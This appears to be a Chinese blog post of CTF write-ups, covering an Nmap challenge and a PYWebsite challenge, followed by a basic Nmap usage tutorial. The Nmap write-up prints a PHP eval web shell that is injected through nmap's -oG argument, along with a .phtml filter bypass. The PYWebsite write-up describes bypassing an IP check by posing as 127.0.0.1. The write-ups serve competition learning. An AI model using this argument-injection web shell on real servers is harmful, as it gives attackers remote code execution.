一天一道ctf 第34天(NMAP)

[网鼎杯 2020 朱雀组]Nmap
在这里插入图片描述
这题和之前有一道Online Tool很像,都是操纵NMAP。参数-oG会将结果存放到hack.php文件里

' <?php @eval($_POST["hack"]);?> -oG hack.php '

结果页面回显给我们一个Hacker…,看来是有什么被过滤了。测试下来是php被过滤了,换成标签phtml就可以了(注意两边两个单引号是要的)

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

上传成功后用蚁剑连接,cat /flag拿到flag

[MRCTF2020]PYWebsite
看一下源码发现了这个东西,想着怎么绕过MD5,访问flag.php后看样子用不着了,验证都是在后端的。
在这里插入图片描述
在这里插入图片描述
这里提到了IP但我怎么也没想到只要把IP改成127.0.0.1就行了(会不会太简单了点?)
直接在flag.php页面

### CTFNmap 的使用教程和技巧 #### 了解基本概念 在CTF竞赛中,Nmap是一个非常重要的网络扫描工具。它可以帮助参赛者发现目标主机和服务的信息,从而为进一步攻击做准备。 #### 基础命令应用 对于单一目标地址的扫描操作相对简单,可以通过指定IP地址来执行快速检测[^3]。例如: ```bash nmap 192.168.1.1 ``` 此命令会返回有关该设备开放端口及其运行服务的数据。 #### 高级功能探索 为了更深入地理解目标环境,在某些情况下可能需要用到更加复杂的选项组合。比如利用脚本引擎来进行特定类型的探测,像下面这样对域名进行IP反向查找: ```bash nmap -sn --script hostmap-ip2hosts www.example.com ``` 上述指令能够揭示与给定网站关联的所有活跃节点列表[^1]。 #### 结果管理 当面对大量数据时,合理保存并解析输出变得至关重要。通过-oX参数可将结果存储成XML文件形式以便后续分析处理[^4]: ```bash nmap 192.168.31.180 -p 80 -oX result.xml ``` 这使得自动化读取成为可能,并且易于与其他程序集成。 #### 实战演练建议 观看专业的教学视频有助于巩固理论知识并向实践过渡。存在一系列专门为初学者设计的教学材料,涵盖了从基础知识到高级技能各个层面的内容[^2]。这些资源不仅限于文字描述,还包括直观易懂的操作演示,非常适合希望提升自己技术水平的人士。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值